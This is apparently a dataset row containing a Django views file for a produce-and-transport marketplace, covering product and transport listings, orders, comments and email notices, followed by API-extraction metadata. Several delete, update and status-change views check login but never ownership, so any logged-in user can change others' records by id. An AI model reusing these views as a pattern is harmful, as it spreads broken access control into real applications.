code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from django.shortcuts import render,redirect,get_object_or_404
from .forms import *
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .models import *
from django.views.generic import DetailView,DeleteView
from django.urls import reverse_lazy
from test2.notification import send_message
from django.core.paginator import Paginator
from real_price.models import *
from django.core.mail import send_mail
# Create your views here.
@login_required
def add_product(request):
md = ProductCatagory.objects.all()
catagory = AddCatagory()
if request.method == 'POST':
form= AddProducts(request.POST, request.FILES)
context ={'form':form,'cat':md}
if form.is_valid():
form.save()
context ={'form':form,'cat':md,'catagory':catagory}
messages.success(request, 'You Have Sucessfully Added new Product ')
return render(request,'product_add.html',context)
else:
print(form.errors)
context ={'form':form,'cat':md,'catagory':catagory}
print(request.user.username)
print(request.user.id)
return render(request,'product_add.html',context)
else:
form = AddProducts()
context ={'form':form,'cat':md,'catagory':catagory}
if request.user.role == 'Producer':
return render(request,'product_add.html',context)
else:
return redirect('homepage')
return render(request,'product_add.html',context)
@login_required
def delete_product(request,pk):
item = Products.objects.get(pk=pk)
item.delete()
messages.success(request, 'You Have Sucessfully Deleted A Product ')
return redirect ('user_products')
@login_required
def update_product(request,pk):
cat = ProductCatagory.objects.all()
pro = Products.objects.get(pk=pk)
if request.method == 'POST':
form1 = AddProducts(request.POST,request.FILES or None,instance = pro)
if form1.is_valid():
form1.save()
print('Product Updated')
return redirect('user_products')
else:
print(form1.errors)
form1 = AddProducts(instance = pro)
context = {'form1':form1,'product':pro,'cat':cat,'pk':pk}
return render(request,'product_update.html',context)
print(form1.errors)
else:
pro = Products.objects.get(pk=pk)
form1 = AddProducts(instance = pro)
context = {'form1':form1,'product':pro,'cat':cat,'pk':pk}
return render(request,'product_update.html',context)
@login_required
def update_transport(request,pk):
pro = Transports.objects.get(pk=pk)
if request.method == 'POST':
form1 = AddTransports(request.POST,request.FILES or None,instance = pro)
if form1.is_valid():
form1.save()
print('Transport Updated')
messages.success(request, 'Transport Updated Sucessfully !')
return redirect('user_products')
else:
print(form1.errors)
form1 = AddTransports(instance = pro)
context = {'form1':form1,'product':pro,'pk':pk}
return render(request,'transport_update.html',context)
print(form1.errors)
else:
pro = Transports.objects.get(pk=pk)
form1 = AddTransports(instance = pro)
context = {'form1':form1,'product':pro,'pk':pk}
return render(request,'transport_update.html',context)
def contactus(request):
if request.method == "POST":
form = MessageSend(request.POST)
if form.is_valid():
form.save()
print('saved')
messages.success(request, 'Your Message Have Been Sucssusfuly Sent ')
print(messages)
return redirect('contactus')
else:
print('notsaved')
print(form.errors)
messages.error(request, 'Your Message Have Not Been Sent ')
print(messages)
form = MessageSend()
context = {'form':form}
return render(request,'contact.html',context)
else:
form = MessageSend()
context = {'form':form}
return render(request,'contact.html',context)
@login_required
def delete_orders(request,pk):
order = ProductOrders.objects.get(pk=pk)
order.delete()
messages.success(request, 'Order Deleted Successfully ')
return redirect('user_products')
@login_required
def delete_transports(request,pk):
order = Transports.objects.get(pk=pk)
order.delete()
messages.success(request, 'Transport Deleted Successfully')
return redirect('user_products')
@login_required
def user_products(request):
my_orders = ProductOrders.objects.filter(ordered_by = request.user)
my_order = my_orders.count()
print(request.user.role)
if request.user.role == 'Producer':
orders = ProductOrders.objects.filter(prouct_owner = request.user)
order = orders.count()
print(orders)
print(request.user.role)
print(request.user.role)
man = request.user
v = Products.objects.filter(user=man)
context = {}
amount = v.count()
context ={'form':v,'amount':amount,'my_orders':my_orders,'my_order':my_order,'orders':orders,'order':order}
return render(request,'userproducts.html',context)
elif request.user.role == 'Transport-Provider':
t_orders = TransportOrders.objects.filter(transport_owner = request.user)
t_order = t_orders.count()
man = request.user
v = Transports.objects.filter(user=man)
amount = v.count()
context ={'transport':v,'amount':amount,'t_orders':t_orders,'t_order':t_order,'my_orders':my_orders,'my_order':my_order,}
return render(request,'userproducts.html',context)
elif request.user.role == 'Price_teller':
orders = ProductOrders.objects.filter(ordered_by = request.user)
price_teller = ProductPrice.objects.filter(user = request.user)
price_count = price_teller.count()
order = orders.count()
context = {'orders':orders,'order':order,'price_teller':price_teller,'price_count':price_count}
return render(request,'price_teller_orders.html',context)
elif request.user.role =='Buyer':
orders = ProductOrders.objects.filter(ordered_by = request.user)
order = orders.count()
context = {'orders':orders,'order':order}
return render(request,'buyer_orders.html',context)
else:
return redirect('homepage')
@login_required
def add_catagory(request):
if request.method == 'POST':
catagory = AddCatagory(request.POST)
if catagory.is_valid():
catagory.save()
messages.success(request, 'New Catagory Added ! ')
return redirect('create_product')
else:
messages.success(request, 'Invalid Catagory ! ')
return redirect('create_product')
else:
return redirect('create_product')
@login_required
def product_detail(request,pk):
form1 = CommentRev()
com = CustomUser.objects.all()
item = Products.objects.get(pk=pk)
print(pk)
if item.user.Adress:
m =item.user.Adress.split(',')
la = m[0]
lo = m[-2]
else:
la = '89.002'
lo = '42.442'
commentes = CommentReview.objects.filter(product_id=pk)
print(commentes)
if request.method =="POST":
form = CommentRev(request.POST)
if form.is_valid():
print('valid')
form.save()
print('saved')
messages.success(request, 'You Have Sucessfully Commented ')
return render(request,'product_detail_view.html',context={'item':item,'comment':commentes,'com ':com,'form':form1,'la':la,'lo':lo})
else:
messages.success(request, 'Unable To Comment! ')
return render(request,'product_detail_view.html',context={'item':item,'com ':com,'comment':commentes,'form':form1,'la':la,'lo':lo})
return render(request,'product_detail_view.html',context={'item':item,'com ':com,'comment':commentes,'form':form1,'la':la,'lo':lo})
@login_required
def change_status(request,pk):
item = ProductOrders.objects.get(pk=pk)
if item.accecpted:
item.accecpted = False
man = request.user.username
body1 = f'\nDear Customer Sorry Your Product Orderd From {man} is Declined Try another Options \n'\
f'Product_owener:{item.prouct_owner.username}\n' \
f'orderd_by :{item.ordered_by.username}\n' \
f'Ordered Date:{item.order_date}\n'\
f'Ordere Id:{item.pk}\n'\
f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
f'Delivery Adress:{request.user.optional_adress}\n'\
f'ordered_item :{item.ordered_item}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
if item.ordered_by.Email_Adress:
email = item.ordered_by.Email_Adress
send_mail("Hello From Drims Team",
body1,
'With Regards Drims Team',
[email],
fail_silently = False)
print('owener email')
item.save()
messages.success(request, 'Request Declined')
return redirect('user_products')
else:
item.accecpted = True
phone = item.ordered_by.phone
owners_phone = item. prouct_owner.phone
body1 = f'\nDear Customer You Have Sucsessfully Orderd A Product \n'\
f'Your Request is Accepted \n'\
f'Product_owener:{item.prouct_owner.username}\n' \
f'orderd_by :{item.ordered_by.username}\n' \
f'Ordered Date:{item.order_date}\n'\
f'Ordere Id:{item.pk}\n'\
f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
f'Delivery Adress:{request.user.optional_adress}\n'\
f'ordered_item :{item.ordered_item}\n\n' \
f'Product_owners Phone Number :{owners_phone}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
man = item.ordered_by.username
body2 = f'\nDear Customer You Have Sucsessfully Accepted Order from {man} \n'\
f'Your Accepted Order Request \n'\
f'Product_owener:{item.prouct_owner.username}\n' \
f'orderd_by :{item.ordered_by.username}\n' \
f'Ordered Date:{item.order_date}\n'\
f'Ordere Id:{item.pk}\n'\
f'Price:{item.ordered_item.price} birr {item.ordered_item.amount} \n'\
f'Delivery Adress:{request.user.optional_adress}\n'\
f'ordered_item :{item.ordered_item}\n\n' \
f'Orderers Phone Number :{phone}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
if item.ordered_by.Email_Adress:
email = item.ordered_by.Email_Adress
print('have orderer email')
send_mail("Hello From Drims Team",
body1,
'With Regards Drims Team',
[email],
fail_silently = False)
if item. prouct_owner.Email_Adress:
email = item. prouct_owner.Email_Adress
send_mail("Hello From Drims Team",
body2,
'With Regards Drims Team',
[email],
fail_silently = False)
print('owener email')
print(body1)
print(body2)
item.save()
messages.success(request, 'You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon ')
return redirect('user_products')
return redirect('user_products')
@login_required
def change_status_transport(request,pk):
item = TransportOrders.objects.get(pk=pk)
if item.status:
item.status = False
man =request.user.username
body1 = f'\nDear {item.ordered_by} Sorry Your Request To Get Transport acess From {man} is Declined \n'\
f'Transport owener:{item.transport_owner.username}\n' \
f'orderd_by :{item.ordered_by.username}\n' \
f'Ordered Date:{item.order_date}\n'\
f'Ordere Id:{item.pk}\n'\
f'Try another Options\n'\
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
if item.ordered_by.Email_Adress:
email = item.ordered_by.Email_Adress
send_mail("Hello From Drims Team",
body1,
'With Regards Drims Team',
[email],
fail_silently = False)
print('owener email')
item.save()
messages.success(request, 'Request Declined')
return redirect('user_products')
else:
item.status = True
owners_phone = item.transport_owner.phone
man = request.user.username
body1 = f'\nDear Your Request To Get Transport access From {man} is Accepted \n'\
f'Your Request is Accepted \n'\
f'Transport owener:{item.transport_owner.username}\n' \
f'orderd_by :{item.ordered_by.username}\n' \
f'Ordered Date:{item.order_date}\n'\
f'Ordere Id:{item.pk}\n'\
f'Transport_owners Phone Number :{owners_phone}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
if item.ordered_by.Email_Adress:
email = item.ordered_by.Email_Adress
send_mail("Hello From Drims Team",
body1,
'With Regards Drims Team',
[email],
)
print('owener email')
send_to = item.ordered_by.phone
print(body1)
item.save()
messages.success(request, 'You Have Sucessfully Accepted A Transport Access Request ')
return redirect('user_products')
@login_required
def order_product(request,pk):
pro = Products.objects.get(pk=pk)
obj = ProductOrders.objects.create(
ordered_by = request.user,
order_source_adress = Products.objects.get(pk=pk).user.Adress,
ordered_item=pro,
prouct_owner = Products.objects.get(pk=pk).user,
order_destination = request.user.Adress,
orderer_optional_adress = request.user.optional_adress
)
phone = request.user.phone
body = f'\nDear Customer You Have Sucsessfully Orderd A Product \n'\
f'Product_owener:{Products.objects.get(pk=pk).user}\n' \
f'orderd_by :{request.user}\n' \
f'Ordered Date:{obj.order_date}\n'\
f'Price:{pro.price}$ {pro.amount}\n'\
f'Delivery Adress:{request.user.optional_adress}\n'\
f'ordered_item :{pro.product_name}\n\n' \
f'Product_owners Phone Number :{pro.user.phone}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
messages.success(request, 'You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! ')
return redirect('product_detail', pk=pk)
@login_required
def search_transport(request):
query = request.GET['query']
filter_by = request.GET['filter_by']
if filter_by == 'description':
product = Transports.objects.filter(description__icontains = query)
paginator = Paginator(product,4)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
messages.success(request, 'Your Search Result Here .. ')
return render(request,'transport_search.html',context={'page_obj':page_obj})
if filter_by == 'specific_adress':
product = Transports.objects.filter(specific_adress__icontains = query)
paginator = Paginator(product,4)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
messages.success(request, 'Your Search Result Here .. ')
return render(request,'transport_search.html',context={'page_obj':page_obj})
if filter_by == 'transport_name':
product = Transports.objects.filter(transport_name__icontains = query)
paginator = Paginator(product,4)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
messages.success(request, 'Your Search Result Here .. ')
return render(request,'transport_search.html',context={'page_obj':page_obj})
if filter_by == 'price':
product = Transports.objects.filter(price__icontains = query)
paginator = Paginator(product,4)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(request,'transport_search.html',context={'page_obj':page_obj})
@login_required
def wantedproductlist(request):
ob = WantedProducts.objects.all()
paginator = Paginator(ob,4)
print(paginator)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(request,'wanted_products_list.html',context={'page_obj':page_obj})
@login_required
def wanted_product_detail(request,pk):
item = WantedProducts.objects.get(pk=pk)
if request.method == 'POST':
phone = item.user.phone
man =request.user.username
body = f'\nDear Customer Your Product Have Been Found By {man} \n'\
f'request id :{item.pk}\n' \
f'founded By :{request.user}\n' \
f'request Date:{item.post_date}\n'\
f'Specific Adress:{item.specific_adress}\n'\
f'requested_item :{item.product_name}\n\n' \
f'Founder Phone Number :{request.user.phone}\n\n' \
f'FROM DRIMS TEAM. \nTank You For Using Our Service'
messages.success(request, 'Your Request is Sent We Will Get To You Later ! Tankyou')
print(body)
return redirect ('wanted_product_detail' ,pk=pk)
else:
context ={'item':item}
return render(request,'wanted_list.html',context)
@login_required
def add_wanted_product(request):
if request.method == 'POST':
form= AddWantedProducts(request.POST, request.FILES)
context ={'form':form}
if form.is_valid():
form.save()
context ={'form':form}
messages.success(request, 'You Have Sucessfully Added Product To Wanted List ')
return render(request,'wanted_product.html',context)
else:
print(form.errors)
context ={'form':form}
print(request.user.username)
print(request.user.id)
return render(request,'wanted_product.html',context)
else:
form = AddWantedProducts()
context ={'form':form}
return render(request,'wanted_product.html',context)
@login_required
def transport_add(request):
form = AddTransports()
context = {'form':form}
if request.method == 'POST':
form = AddTransports(request.POST,request.FILES)
if form.is_valid():
form.save()
messages.success(request, 'You Have Sucessfully Added Transport Options')
return redirect('transport_add')
else:
messages.success(request, 'You Please Provide Valid Information !!!')
return redirect('transport_add')
else:
return render(request,'add_transports.html',context)
@login_required
def display_transports(request):
ob = Transports.objects.all()
paginator = Paginator(ob,4)
print(paginator)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
return render(request,'transport_list.html',context={'page_obj':page_obj})
@login_required
def transport_product_detail(request,pk):
item = Transports.objects.get(pk=pk)
if request.method == 'POST':
print("Request Sent")
messages.success(request, 'Your Request is Sent We Will Get To You Later ! Tankyou')
return redirect ('transport_product_detail' ,pk=pk)
else:
context ={'item':item}
return render(request,'transport_details.html',context)
@login_required
def order_Transport(request,pk):
pro = Transports.objects.get(pk=pk)
obj = TransportOrders.objects.create(
ordered_by = request.user,
order_source_adress = Transports.objects.get(pk=pk).user.Adress,
transport_owner = Transports.objects.get(pk=pk).user,
orderer_optional_adress = request.user.optional_adress
)
messages.success(request, 'You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! ')
return redirect('transport_product_detail', pk=pk)
| [
"django.shortcuts.render",
"django.core.mail.send_mail",
"django.contrib.messages.error",
"django.shortcuts.redirect",
"django.contrib.messages.success",
"django.core.paginator.Paginator"
] | [((1667, 1735), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Deleted A Product """'], {}), "(request, 'You Have Sucessfully Deleted A Product ')\n", (1683, 1735), False, 'from django.contrib import messages\n'), ((1747, 1772), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (1755, 1772), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4452, 4508), 'django.contrib.messages.success', 'messages.success', (['request', '"""Order Deleted Successfully """'], {}), "(request, 'Order Deleted Successfully ')\n", (4468, 4508), False, 'from django.contrib import messages\n'), ((4520, 4545), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (4528, 4545), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4663, 4722), 'django.contrib.messages.success', 'messages.success', (['request', '"""Transport Deleted Successfully"""'], {}), "(request, 'Transport Deleted Successfully')\n", (4679, 4722), False, 'from django.contrib import messages\n'), ((4734, 4759), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (4742, 4759), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((8290, 8431), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'com ': com, 'comment': commentes, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item, 'com ':\n com, 'comment': commentes, 'form': form1, 'la': la, 'lo': lo})\n", (8296, 8431), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((11939, 11964), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (11947, 11964), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((15127, 15303), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! """'], {}), '(request,\n """You Have Sucessfully Sent Order Request For Product Owner\n You will Get Message Notification Soon Wen Request Approved !\n Tank You ! """\n )\n', (15143, 15303), False, 'from django.contrib import messages\n'), ((15305, 15338), 'django.shortcuts.redirect', 'redirect', (['"""product_detail"""'], {'pk': 'pk'}), "('product_detail', pk=pk)\n", (15313, 15338), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((17156, 17172), 'django.core.paginator.Paginator', 'Paginator', (['ob', '(4)'], {}), '(ob, 4)\n', (17165, 17172), False, 'from django.core.paginator import Paginator\n'), ((17326, 17402), 'django.shortcuts.render', 'render', (['request', '"""wanted_products_list.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'wanted_products_list.html', context={'page_obj': page_obj})\n", (17332, 17402), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19805, 19821), 'django.core.paginator.Paginator', 'Paginator', (['ob', '(4)'], {}), '(ob, 4)\n', (19814, 19821), False, 'from django.core.paginator import Paginator\n'), ((19948, 20018), 'django.shortcuts.render', 'render', (['request', '"""transport_list.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_list.html', context={'page_obj': page_obj})\n", (19954, 20018), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20816, 20962), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! """'], {}), '(request,\n """You Have Sucessfully Requested A Transport Acsess We Will Get \nTo You When Request Is Accpted Tankyou ! """\n )\n', (20832, 20962), False, 'from django.contrib import messages\n'), ((20963, 21006), 'django.shortcuts.redirect', 'redirect', (['"""transport_product_detail"""'], {'pk': 'pk'}), "('transport_product_detail', pk=pk)\n", (20971, 21006), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1513, 1557), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1519, 1557), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2608, 2655), 'django.shortcuts.render', 'render', (['request', '"""product_update.html"""', 'context'], {}), "(request, 'product_update.html', context)\n", (2614, 2655), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3518, 3567), 'django.shortcuts.render', 'render', (['request', '"""transport_update.html"""', 'context'], {}), "(request, 'transport_update.html', context)\n", (3524, 3567), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((4296, 4336), 'django.shortcuts.render', 'render', (['request', '"""contact.html"""', 'context'], {}), "(request, 'contact.html', context)\n", (4302, 4336), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((5480, 5525), 'django.shortcuts.render', 'render', (['request', '"""userproducts.html"""', 'context'], {}), "(request, 'userproducts.html', context)\n", (5486, 5525), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7240, 7266), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7248, 7266), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((9502, 9547), 'django.contrib.messages.success', 'messages.success', (['request', '"""Request Declined"""'], {}), "(request, 'Request Declined')\n", (9518, 9547), False, 'from django.contrib import messages\n'), ((9564, 9589), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (9572, 9589), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((11764, 11889), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon """'], {}), "(request,\n 'You Have Sucessfully Accepted A Product Request You will Get Message Notification Soon '\n )\n", (11780, 11889), False, 'from django.contrib import messages\n'), ((11897, 11922), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (11905, 11922), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((12913, 12958), 'django.contrib.messages.success', 'messages.success', (['request', '"""Request Declined"""'], {}), "(request, 'Request Declined')\n", (12929, 12958), False, 'from django.contrib import messages\n'), ((12974, 12999), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (12982, 12999), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((13974, 14064), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Accepted A Transport Access Request """'], {}), "(request,\n 'You Have Sucessfully Accepted A Transport Access Request ')\n", (13990, 14064), False, 'from django.contrib import messages\n'), ((14077, 14102), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (14085, 14102), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((15594, 15615), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (15603, 15615), False, 'from django.core.paginator import Paginator\n'), ((15720, 15776), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. """'], {}), "(request, 'Your Search Result Here .. ')\n", (15736, 15776), False, 'from django.contrib import messages\n'), ((15793, 15865), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (15799, 15865), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16003, 16024), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16012, 16024), False, 'from django.core.paginator import Paginator\n'), ((16129, 16185), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. """'], {}), "(request, 'Your Search Result Here .. ')\n", (16145, 16185), False, 'from django.contrib import messages\n'), ((16202, 16274), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16208, 16274), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16430, 16451), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16439, 16451), False, 'from django.core.paginator import Paginator\n'), ((16556, 16612), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Search Result Here .. """'], {}), "(request, 'Your Search Result Here .. ')\n", (16572, 16612), False, 'from django.contrib import messages\n'), ((16629, 16701), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16635, 16701), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((16819, 16840), 'django.core.paginator.Paginator', 'Paginator', (['product', '(4)'], {}), '(product, 4)\n', (16828, 16840), False, 'from django.core.paginator import Paginator\n'), ((16953, 17025), 'django.shortcuts.render', 'render', (['request', '"""transport_search.html"""'], {'context': "{'page_obj': page_obj}"}), "(request, 'transport_search.html', context={'page_obj': page_obj})\n", (16959, 17025), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18056, 18144), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Request is Sent We Will Get To You Later ! Tankyou"""'], {}), "(request,\n 'Your Request is Sent We Will Get To You Later ! Tankyou')\n", (18072, 18144), False, 'from django.contrib import messages\n'), ((18176, 18216), 'django.shortcuts.redirect', 'redirect', (['"""wanted_product_detail"""'], {'pk': 'pk'}), "('wanted_product_detail', pk=pk)\n", (18184, 18216), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18271, 18315), 'django.shortcuts.render', 'render', (['request', '"""wanted_list.html"""', 'context'], {}), "(request, 'wanted_list.html', context)\n", (18277, 18315), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19065, 19112), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (19071, 19112), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19659, 19706), 'django.shortcuts.render', 'render', (['request', '"""add_transports.html"""', 'context'], {}), "(request, 'add_transports.html', context)\n", (19665, 19706), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20187, 20275), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Request is Sent We Will Get To You Later ! Tankyou"""'], {}), "(request,\n 'Your Request is Sent We Will Get To You Later ! Tankyou')\n", (20203, 20275), False, 'from django.contrib import messages\n'), ((20287, 20330), 'django.shortcuts.redirect', 'redirect', (['"""transport_product_detail"""'], {'pk': 'pk'}), "('transport_product_detail', pk=pk)\n", (20295, 20330), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20385, 20435), 'django.shortcuts.render', 'render', (['request', '"""transport_details.html"""', 'context'], {}), "(request, 'transport_details.html', context)\n", (20391, 20435), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((844, 912), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added new Product """'], {}), "(request, 'You Have Sucessfully Added new Product ')\n", (860, 912), False, 'from django.contrib import messages\n'), ((932, 976), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (938, 976), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1179, 1223), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1185, 1223), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1390, 1434), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1396, 1434), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1466, 1486), 'django.shortcuts.redirect', 'redirect', (['"""homepage"""'], {}), "('homepage')\n", (1474, 1486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2123, 2148), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (2131, 2148), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2333, 2380), 'django.shortcuts.render', 'render', (['request', '"""product_update.html"""', 'context'], {}), "(request, 'product_update.html', context)\n", (2339, 2380), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2965, 3025), 'django.contrib.messages.success', 'messages.success', (['request', '"""Transport Updated Sucessfully !"""'], {}), "(request, 'Transport Updated Sucessfully !')\n", (2981, 3025), False, 'from django.contrib import messages\n'), ((3045, 3070), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (3053, 3070), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3247, 3296), 'django.shortcuts.render', 'render', (['request', '"""transport_update.html"""', 'context'], {}), "(request, 'transport_update.html', context)\n", (3253, 3296), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3767, 3836), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Message Have Been Sucssusfuly Sent """'], {}), "(request, 'Your Message Have Been Sucssusfuly Sent ')\n", (3783, 3836), False, 'from django.contrib import messages\n'), ((3884, 3905), 'django.shortcuts.redirect', 'redirect', (['"""contactus"""'], {}), "('contactus')\n", (3892, 3905), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3993, 4053), 'django.contrib.messages.error', 'messages.error', (['request', '"""Your Message Have Not Been Sent """'], {}), "(request, 'Your Message Have Not Been Sent ')\n", (4007, 4053), False, 'from django.contrib import messages\n'), ((4170, 4210), 'django.shortcuts.render', 'render', (['request', '"""contact.html"""', 'context'], {}), "(request, 'contact.html', context)\n", (4176, 4210), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6009, 6054), 'django.shortcuts.render', 'render', (['request', '"""userproducts.html"""', 'context'], {}), "(request, 'userproducts.html', context)\n", (6015, 6054), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6986, 7036), 'django.contrib.messages.success', 'messages.success', (['request', '"""New Catagory Added ! """'], {}), "(request, 'New Catagory Added ! ')\n", (7002, 7036), False, 'from django.contrib import messages\n'), ((7058, 7084), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7066, 7084), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7115, 7163), 'django.contrib.messages.success', 'messages.success', (['request', '"""Invalid Catagory ! """'], {}), "(request, 'Invalid Catagory ! ')\n", (7131, 7163), False, 'from django.contrib import messages\n'), ((7185, 7211), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7193, 7211), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7846, 7906), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Commented """'], {}), "(request, 'You Have Sucessfully Commented ')\n", (7862, 7906), False, 'from django.contrib import messages\n'), ((7925, 8066), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'comment': commentes, 'com ': com, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item,\n 'comment': commentes, 'com ': com, 'form': form1, 'la': la, 'lo': lo})\n", (7931, 8066), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((8075, 8123), 'django.contrib.messages.success', 'messages.success', (['request', '"""Unable To Comment! """'], {}), "(request, 'Unable To Comment! ')\n", (8091, 8123), False, 'from django.contrib import messages\n'), ((8142, 8283), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'com ': com, 'comment': commentes, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item, 'com ':\n com, 'comment': commentes, 'form': 